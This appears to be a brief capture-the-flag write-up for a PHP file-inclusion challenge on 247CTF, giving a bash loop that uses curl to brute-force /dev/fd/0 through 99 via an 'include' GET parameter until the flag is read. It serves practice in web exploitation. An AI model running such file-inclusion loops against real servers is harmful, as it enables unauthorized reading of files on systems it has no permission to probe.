We know that the flag is in /tmp/flag.txt and we have to send a parameter named include to the server with method GET to read a file.
PHP have a bug named Cannot open file descriptor streams, then we will brute force to find the flag.
https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/<i>With 0 <= i <= 99, because include‘s length is less than or equal to 10.
We use:
for i in $(seq 0 99); do echo; echo "Testing fd $i"; curl -s https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/$i | grep 247; doneThe flag is printed when i = 10.
ethan 